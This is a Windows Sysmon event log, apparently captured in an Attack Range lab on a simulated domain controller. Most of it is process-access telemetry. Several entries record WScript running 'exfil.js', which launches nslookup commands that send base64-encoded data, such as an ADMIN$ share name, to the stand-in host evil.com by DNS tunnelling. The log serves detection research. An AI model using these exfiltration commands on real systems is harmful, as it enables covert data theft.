14:21:48.582{2E1864BB-18FC-629A-F845-000000005F02}28208048C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F945-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F945-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.566{2E1864BB-18FC-629A-F745-000000005F02}79641300C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-F945-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.577{2E1864BB-18FC-629A-F945-000000005F02}6008C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-F745-000000005F02}7964C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlebhd.tmp 2>&1 10341000x8000000000000000214665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.551{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F845-000000005F02}2820C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.551{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F845-000000005F02}2820C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.551{2E1864BB-18FC-629A-F845-000000005F02}28208048C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F745-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F845-000000005F02}2820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F745-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.535{2E1864BB-18E0-629A-6742-000000005F02}39764208C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-F745-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.537{2E1864BB-18FC-629A-F745-000000005F02}7964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlebhd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.519{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlykzztts.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.504{2E1864BB-18FC-629A-F545-000000005F02}77926200C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F645-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.504{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.504{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F645-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.504{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.503{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.502{2E1864BB-18FC-629A-F445-000000005F02}56244776C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-F645-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.502{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.501{2E1864BB-18FC-629A-F645-000000005F02}1220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-F445-000000005F02}5624C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykzztts.tmp 2>&1 10341000x8000000000000000214645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.481{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F545-000000005F02}7792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.481{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F545-000000005F02}7792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.466{2E1864BB-18FC-629A-F545-000000005F02}77926200C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F445-000000005F02}5624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.466{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F545-000000005F02}7792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 